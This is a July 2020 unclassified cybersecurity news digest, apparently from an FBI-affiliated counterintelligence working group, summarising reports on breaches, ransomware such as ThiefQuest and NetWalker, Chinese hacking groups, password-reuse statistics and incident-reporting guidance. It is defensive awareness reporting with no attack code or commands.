20200710

pdf

School

Wichita State University *

*We aren’t endorsed by this school

Course

453

Subject

Information Systems

Date

Nov 24, 2024

Type

pdf

Pages

7

Uploaded by eras3r98

Report
UNCLASSIFIED Page 1 10 July 2020 Table of Contents U.S. finalizing federal contract ban for companies that use Huawei, others DOJ indicts 'fxmsp' hacker who reportedly breached hundreds of companies German intel warns against giving data to Chinese tech firms MongoDB is subject to continual attacks when exposed to the internet Casino App Clubillion Leaks PII on “Millions” of Users BMW customer database for sale on dark web One out of every 142 passwords is '123456' Connection discovered between Chinese hacker group APT15 and defense contractor Netgear not quite halfway there with patches for 28 out of 79 vulnerable router models DDoS Attacks Jump 542% from Q4 2019 to Q1 2020 New ThiefQuest ransomware discovered targeting macOS users BBC Publishes Screenshots Allegedly Depicting Ransomware Negotiations Between NetWalker and UCSF 'Keeper' hacking group behind hacks at 570 online stores U.S. finalizing federal contract ban for companies that use Huawei, others Reuters, 9 Jul 2020: The Trump administration plans to finalize regulations this week that will bar the U.S. government from buying goods or services from any company that uses products from five Chinese companies including Huawei, Hikvision and Dahua, a U.S. official said. The rule, which was prompted by a 2019 law, could have far-ranging implications for companies that sell goods and services to the U.S. government since they will now need to certify they do not use products from Dahua or Hikvision, even though both are among the top sellers of surveillance equipment and cameras worldwide. The same goes for two-way radios from Hytera Communications Corp and telecommunications equipment or mobile devices like smartphones from Huawei Technologies or ZTE Corp. Any company that uses equipment or services in their day-to-day operations from these five companies will no longer be able to sell to the U.S. government without obtaining a U.S. government waiver. The White House action comes amid increasing U.S.-China tension over the handling of the novel coronavirus, China’s actions in the former British colony of Hong Kong and a nearly two-year trade war. While it is unclear if this will have an impact on current contracts, it could complicate future contracts. Amazon.com Inc, for example, received 1,500 cameras to take temperatures of workers during the coronavirus pandemic from Zhejiang Dahua Technology Co Ltd in April. Amazon’s cloud unit is a major contractor with the U.S. intelligence community, and it has been battling Microsoft Corp for an up to $10 billion cloud computing deal with the Pentagon. The official said the administration will require agencies to conduct a national security analysis before they grant any waivers, something Congress did not expressly require in the statute. On June 30, the Federal Communications Commission formally designated Huawei and ZTE Corp as posing threats to U.S. national security, a Purpose Educate recipients of cyber events to aid in protecting electronically stored DoD, corporate proprietary, and/or Personally Identifiable Information from unauthorized access, theft or espionage Source This publication incorporates open source news articles to educate readers on cyber security matters IAW USC Title 17, section 107, Para a. All articles are truncated to avoid the appearance of copyright infringement Newsletter Team * SA Sylvia Romero Albuquerque FBI * CI Agent Scott Daughtry Purple Arrow Founder Subscription/Questions Click HERE to request for your employer-provided email address to be added to this product’s distribution list Purple Arrow Overview The Purple Arrow Working Group was founded in 2009 to address suspicious reporting originating from New Mexico (NM) cleared companies. Purple Arrow is a subset of the NM CI Working Group. Purple Arrow Members Our membership includes representatives from these New Mexico-focused agencies: 902nd MI, AFOSI, DOE, DCSA, DTRA, FBI, HSI and NCIS Disclaimer Viewpoints, company names, or products within this document are not necessarily the opinion of, or an endorsement by, the FBI or any member of the Purple Arrow Working Group or NM CI Working Group Distribution You may freely forward this product to U.S. person co-workers or other U.S. agency / U.S. company managed email accounts Personal Email/Foreigners The FBI will not send Purple Arrow products to a non-United States employer-provided email account (e.g. Hotmail, Gmail)
UNCLASSIFIED Page 2 declaration that bars U.S. firms from tapping an $8.3 billion government fund to purchase equipment from the companies. DOJ indicts 'fxmsp' hacker who reportedly breached hundreds of companies Engadget, 7 Jul 2020: An American court has unsealed the criminal charges [ link ] against a prolific hacker known as fxmsp, finally revealing the identity of the “invisible god of networks.” In an announcement posted by the Western District of Washington’s US Attorney’s Office, authorities have identified fxmsp as a 37-year-old Kazakhstan citizen named Andrey Turchin. The five felony charges against Turchin date back to December 2018, but they remained sealed until this revelation, which follows a report published by security vendor Group-IB about the extent of fxmsp’s illicit activities [ link ]. According to authorities, Turchin and his accomplices targeted hundreds of corporate networks in more than 40 countries between October 2017 and December 2018. Group-IB’s report says fxmsp and his group sold network access to hotel chains, banks and other financial firms, making at least $1.5 million from their operation. As a result of their activities, their victims reportedly lost tens of millions of dollars to malware and network damage. They’ve been inactive since last year after fxmsp made headlines for advertising access to data from popular cybersecurity firms McAfee, Trend Micro and Symantec. However, at least one cybersecurity firm believes they’re still operating under different names. German intel warns against giving data to Chinese tech firms Associated Press, 9 Jul 2020: Germany's domestic intelligence agency is warning consumers that personal data they provide to Chinese payment companies or other tech firms could end up in the hands of China's government. In its annual report released Thursday, the BfV agency noted that Chinese government offices have access to data stored in China by companies such as Tencent, Alibaba “as well as other apps, web services and mobility providers such as for example (bike sharing) providers” that operate in Germany. The head of the BfV, Thomas Haldenwang, said German's data isn't safe with Chinese companies because they are required by law to provide the data to their government. “Any customer here in Germany who uses such a system shouldn't be surprised if this data is abused in Beijing,” he told reporters. “We can only warn against this.” Seehofer added that Germany has yet to reach a “political decision” on whether to let Chinese telecom equipment company Huawei supply infrastructure to German cellphone service providers. Incident Reporting - Cleared Company: notify your Defense Counterintelligence and Security Service representative. If the event compromised DoD information, you must also initiate the DIBNET process. - Financial Scam/Fraud: submit a complaint to the FBI’s Internet Crime Complaint Center ( IC3 ) - Children: if a child has been targeted via the Internet, contact your state’s Attorney General via their web site. They likely have an Internet Crimes against Children task force that specializes in this crime category Cyber investigations are likely to require the original offending email (to obtain the email headers) and/or log files that are generated/maintained by an IDS, router or firewall. Ensure your IT office preserves this information should law enforcement request them for analysis. Newsletter Archival We do not maintain a formal archive of this newsletter. Your company/agency may archive Purple Arrow products on its internal network. This product may NOT be altered in any way. Cybersecurity Training All employees must understand cyber threats and think defensively every time they use automated systems. Many intrusions occur because a single employee failed basic cybersecurity practices and clicked on a hostile hyperlink or opened a malicious file attachment. The Defense Counterintelligence and Security Agency (formerly known as DSS) offers free cyber training via its Center for Development of Security Excellence (CDSE) website. Click HERE for info
UNCLASSIFIED Page 3 MongoDB is subject to continual attacks when exposed to the internet Helpnet Security, 8 Jul 2020: On average, an exposed Mongo database is breached within 13 hours of being connected to the internet. The fastest breach recorded was carried out 9 minutes after the database was set up, according to Intruder. MongoDB is a general purpose, document-based, distributed database that consistently ranks in the top 5 most-used databases worldwide. It is used by a wide range of organizations all over the globe to store and secure sensitive application and customer data. There are 80,000 exposed MongoDB services on the internet, of which 20,000 were unsecured. Of those unsecured databases, 15,000 are already infected with ransomware. The research shows that MongoDB is subject to continual attacks when exposed to the internet. Attacks are carried out automatically and indiscriminately and on average an unsecured database is compromised less than 24 hours after going online. At least one of the honeypots was held to ransom within a minute of connecting. The attacker erased the database’s tables and replaced them with a ransom note, requesting payment in Bitcoin for recovery of the data. Attacks originated from locations all over the globe, though attackers routinely hide their true location, so there’s often no way to tell where attacks are really coming from. The fastest breach came from an attacker from Russian ISP Skynet and over half of the breaches originated from IP addresses owned by a Romanian VPS provider. “Even if security teams can detect an unsecured database and recognise its potential severity, responding to and containing such a misconfiguration in less than 13 hours may be a tall order, let alone in under 9 minutes. Prevention is a much stronger defence than cure.” Casino App Clubillion Leaks PII on “Millions” of Users Infosecurity Magazine, 8 Jul 2020: An unsecured Elasticsearch database has been leaking data on millions of global gambling app users, according to researchers at vpnMentor. The group discovered the unsecured database hosted on AWS as part of a broader web mapping project. It was quickly traced back to casino app Clubillion, which was contacted on March 23. The database was finally secured on April 5, five days after AWS was also contacted. Unlike many similar discoveries, this online database was updated with huge amounts of users’ personal information every single day: in the region of 200 million new records, or 50GB, daily, and sometimes considerably more, according to vpnMentor. These records included every action taken by every player on the app (“win,” “lose,” “update account,” etc.) and personally identifiable information (PII) including emails, private messages, winnings and IP addresses. The research team warned that gambling apps are a popular target for cyber-criminals, who go looking for PII and to target software vulnerabilities in order to install malware on users’ devices. “On a single day, tens of thousands of individual Clubillion players were exposed. Each one of these players could be targeted by malicious hackers for fraud and cyber-attacks – along with millions more whose records were also contained in the database,” it claimed. BMW customer database for sale on dark web SC Magazine, 2 Jul 2020: A database of 384,319 BMW car owners in the U.K. is being offered for sale on an underground forum by the KelvinSecurity Team hacking group, according to KELA, a darknet threat intelligence firm, based in Tel Aviv. According to KELA, the threat actor claimed that the BMW data came from a “call center” that manages customers of different car suppliers. KELA said it obtained the database and found that it contains almost 500,000 customer records from 2016 to 2018, also affecting U.K. owners of other car manufacturers, including Mercedes, SEAT, Honda and Hyundai, among others. KELA told SC Media
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
UNCLASSIFIED Page 4 KelvinSecurityTeam has been highly active on underground forums, offering in June 2020 alone for sale 16 databases, including data related to U.S government contractors and Russian military weapons development. In addition, the group reportedly dumped for free 28 databases affecting entities in Mexico, Iran, U.S., Australia, Sweden, France and Indonesia. One out of every 142 passwords is '123456' ZD Net, 1 Jul 2020: In one of the biggest password re-use studies of its kind, an analysis of more than one billion leaked credentials has discovered that one out of every 142 passwords is the classic "123456" string. The study, carried out last month by computer engineering student Ata Hakçıl, analyzed username and password combinations that leaked online after data breaches at various companies. The data dumps are easily available online, on sites like GitHub or GitLab, or freely distributed via hacking forums and file-sharing portals. Over the years, tech companies have been collecting these data dumps. For example, Google, Microsoft, and Apple, have collected leaked credentials to create in-house alert systems that warn users when they're utilizing a "weak" or "common" password. Last month, Hakçıl, a Turkish student studying at a university in Cyprus, downloaded and analyzed more than one billion leaked credentials. The main discovery was that the 1,000,000,000+ credentials dataset included only 168,919,919 unique passwords, of which more than 7 million were the "123456" string. This means that one out of every 142 passwords included in the sample Hakçıl analyzed was th e weakest password known today -- with the "123456" string being the most commonly reused password online for the past five years in a row, and counting. The study's full results are available on GitHub [ link ], with a short summary below: From 1.000.000.000+ lines of dumps, 257.669.588 were filtered as either corrupt data(gibberish in improper format) or test accounts. 1 Billion credentials boil down to 168.919.919 passwords, and 393.386.953 usernames. Most common password is 123456. It covers roughly 0.722% of all the passwords. (Around 7 million times per billion) Most common 1000 passwords cover 6.607% of all the passwords. With most common 1 million passwords, hit-rate is at 36.28%, and with most common 10 million passwords hit rate is at 54.00%. Average password length is 9.4822 characters. 12.04% of passwords contain special characters. 28.79% of passwords are letters only. 26.16% of passwords are lowercase only. 13.37% of passwords are numbers only. 34.41% of all passwords end with digits, but only 4.522% of all passwords start with digits. Connection discovered between Chinese hacker group APT15 and defense contractor ZD Net, 2 Jul 2020: Lookout said it linked APT15 malware to Xi'an Tianhe Defense Technology, a Chinese defense contractor. In a report published today [ link ], cyber-security firm Lookout said it found evidence connecting Android malware that was used to spy on minorities in China to a large government defense
UNCLASSIFIED Page 5 contractor from the city of Xi'an. Some of the group's past hacking operations have been documented by other cyber-security firms, and the hacking group is already known in industry circles under different codenames, such as APT15, GREF, Ke3chang, Mirage, Vixen Panda, and Playful Dragon. The vast majority of past APT15 attacks involved malware designed to infect Windows desktops, but Lookout said the group also developed an arsenal of Android hacking tools. Hacking tools that were already known include malware strains identified as HenBox, PluginPhantom, Spywaller, and DarthPusher. On top of these, Lookout said it also discovered four new ones, which they codenamed SilkBean, DoubleAgent, CarbonSteal, and GoldenEagle. The fact that Lookout linked an APT15 malware sample to a Chinese defense contractor is not a novel discovery. From 2017 to 2019, four other Chinese state-sponsored hacking groups have been linked to contractors hired by Chinese intelligence agencies operating in various regional offices. This includes: APT3 - linked to a company named Boyusec operating on behalf of Chinese state security officials in the province of Guangdong APT10 - linked to several companies operating on behalf of Chinese state security officials in the province of Tianjin APT17 - linked to several companies operating on behalf of Chinese state security officials in the province of Jinan APT40 - linked to several shell companies operating on behalf of Chinese state security officials in the province of Hainan Operators behind APT3 and APT10 have eventually been charged by the US Department of Justice in November 2017 and December 2018, respectively. Based on previous threat intelligence reports published by cyber-security firm Recorded Future and CrowdStrike, the Chinese Ministry of State Security outsources hacking operations to outside contractors, who report directly and take orders from intelligence officials. Netgear not quite halfway there with patches for 28 out of 79 vulnerable router models TheRegister, 30 Jun 2020: Netgear has now patched 28 out of 79 vulnerable router models, six months after infosec researchers first noticed security problems potentially allowing an attacker to remotely execute code as root. The latest hotfixes come after two models were fixed earlier in June. The vulnerability in question could, for example, allow the opening of a superuser-level telnet backdoor, as we reported at the time. Over the past few weeks Netgear has been pushing out fixes, having so far plugged problems with 28 of the 79 models it says are affected by the unwanted remote-superuser flaw. The vulnerabilities, initially discovered by Trend Micro's Zero Day Initiative (ZDI) in January, were meant to have been patched by 15 June. Netgear asked for an extension at the end of May for a further month, prompting the ZDI to publish an advisory note. "The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to update to the most recent firmware version and to replace end-of-life devices that are no longer supported with security patches," said the US computer security agency in a note issued last night.
UNCLASSIFIED Page 6 DDoS Attacks Jump 542% from Q4 2019 to Q1 2020 DarkReading, 30 Jun 2020: In the first quarter of 2020, distributed denial-of-service (DDoS) attacks jumped more than 542% compared with the last quarter of 2019 and more than 278% year-over-year. NexusGuard researchers suggest the spike may be linked to a parallel increase in malicious cyber activity during the COVID- 19 pandemic [ link ]. Cybercriminals have responded to the work-from-home shift with a series of long DDoS attacks aimed at hosting providers and businesses. The Akamai team recently mitigated the largest packet- per-second DDoS attack recorded on the company's platform — double the volume of its previous record. Researchers see attackers shifting toward attacks with lower bits-per-second and higher packets-per-second, likely seeking weak spots in DDoS mitigation techniques. In addition to traditional DDoS attacks, NexusGuard researchers detected abnormal traffic patterns from ISPs such as traffic generated from infected devices, and traffic generated by exploiting open resolvers (DNS, DLAP, etc.) to create small, short attacks they call "invisible killers." ISPs often overlook these threats, the researchers explain in a new DDoS threat report. New ThiefQuest ransomware discovered targeting macOS users ZD Net, 30 Jun 2020: Named OSX.ThiefQuest (or EvilQuest), this ransomware is different from previous macOS ransomware threats because besides encrypting the victim's files, ThiefQuest also installs a keylogger, a reverse shell, and steals cryptocurrency wallet-related files from infected hosts. "Armed with these capabilities, the attacker can main full control over an infected host," said Patrick Wardle, Principal Security Researcher at Jamf. This means that even if victims paid, the attacker would still have access to their computer and continue to steal files and keyboard strokes. Reed and Stokes are currently looking for a weakness or bug in the ransomware's encryption scheme that could be exploited to create a decryptor and help infected victims recover their files without paying the ransom. But the researcher who first spotted the new ThiefQuest ransomware is K7 Lab security researcher Dinesh Devadoss. Devadoss tweeted about his finding yesterday, June 29. However, new evidence surfaced in the meantime has revealed that EvilQuest has been, in reality, distributed in the wild since the start of June 2020. Reed told ZDNet in a phone call today that Malwarebytes found ThiefQuest hidden inside pirated macOS software uploaded on torrent portals and online forums, such as a pirated version of music production app Ableton, DJ mixing software Mixed In Key, and security tool Little Snitch. However, Reed told us he believes the ransomware is most likely more broadly distributed, leveraging many more other apps, and not just these three. Stokes told ZDNet the ransomware will encrypt any files with the following file extensions: .pdf, .doc, .jpg, .txt, .pages, .pem, .cer, .crt, .php, .py, .h, .m, .hpp, .cpp, .cs, .pl, .p, .p3, .html, .webarchive, .zip, .xsl, .xslx, .docx, .ppt, .pptx, .keynote, .js, .sqlite3, .wallet, .dat. After the encryption process ends, the ransomware installs a keylogger to record all the user's keystrokes, a reverse shell so the attacker can connect to the infected host and run custom commands, and will also look to steal certain files. In his own analysis of ThiefQuest, Reed also noted that the ransomware also attempts to modify files specific to Google Chrome's update mechanism, and use the files as a form of persistence on infected hosts. All victims infected by this point should consider their data lost forever, unless researchers find a way to break the encryption and recover their files. ThiefQuest is the third ransomware strain that has exclusively targeted macOS users after KeRanger and Patcher. Another macOS ransomware strain called Mabouia only existed at a theoretical level and was never released in the real world.
Your preview ends here
Eager to read complete document? Join bartleby learn and gain access to the full version
  • Access to all documents
  • Unlimited textbook solutions
  • 24/7 expert homework help
UNCLASSIFIED Page 7 BBC Publishes Screenshots Allegedly Depicting Ransomware Negotiations Between NetWalker and UCSF Security Boulevard, 1 Jul 2020: The BBC claims to have obtained proof of ransom negotiations between the NetWalker gang and the University of California San Francisco almost a week after the college publicly reported on the costly security incident. Readers might recall that NetWalker ransomware operators recently persuaded the UCSF to pay over $1 million in an extortion scheme using data-encrypting malware. Now, BBC News reports that an anonymous tip-off allegedly enabled the outlet to follow the ransom negotiations in a live chat on the dark web. According to the screen captures, NetWalker operators initially demanded a $3 million ransom, reasoning the amount is pennies for an education institution with billions in annual turnover. But the university, likely with the help of an external specialist negotiator, explained the pandemic had been “financially devastating” for the college and asked them to accept $780,000. After some back and forth, the hackers eventually accepted 116.4 bitcoins, or roughly $1.14 million. 'Keeper' hacking group behind hacks at 570 online stores ZD Net, 7 Jul 2020: A hacking group known as "Keeper" is responsible for security breaches at more than 570 online e-commerce portals over the last three years. The Keeper gang broke into online store backends, altered their source code, and inserted malicious scripts that logged payment card details entered by shoppers in checkout forms. These types of attacks are what the cyber-security community calls web skimming, e- skimming, or "Magecart" intrusions (named so after the first hacker group that used these tactics). In a report published today by threat intelligence firm Gemini Advisory, the company says that Keeper has been operating since at least April 2017, and continues to operate even today. By fingerprinting this backend panel, Gemini was able to track all of Keeper's historical activities. This included the locations of past backend panels, malicious URLs used to host hacking infrastructure, but also a list of hacked online stores where Keeper inserted its malicious scripts. Gemini said that almost 85% of the 570 hacked stores ran on top of the Magento e-commerce platform. Most of the stores were small to medium-sized operations. Based on Amazon's Alexa traffic rankings, Gemini says the vast majority of stores were small-scale operations but that Keeper also hit some big names -- sites that drew between 500,000 and 1,000,000 monthly visitors. "Based on the provided number of collected cards during a nine-month window, and accounting for the group's operations since April 2017, Gemini estimates that it has likely collected close to 700,000 compromised cards," Gemini experts said in a report shared today with ZDNet [ link ]. "Given the current dark web median price of $10 per compromised Card Not Present (CNP) card, this group has likely generated upwards of $7 million USD from stealing and selling compromised payment cards in its full lifespan." The Gemini Advisory report contains the full list of all the 570+ sites that the Keeper gang hacked since April 2017 [ link ]. The Keeper group is tracked by other cyber-security companies as Magecart Group #8 , CoffeeMokko, and JS-Sniffers 4.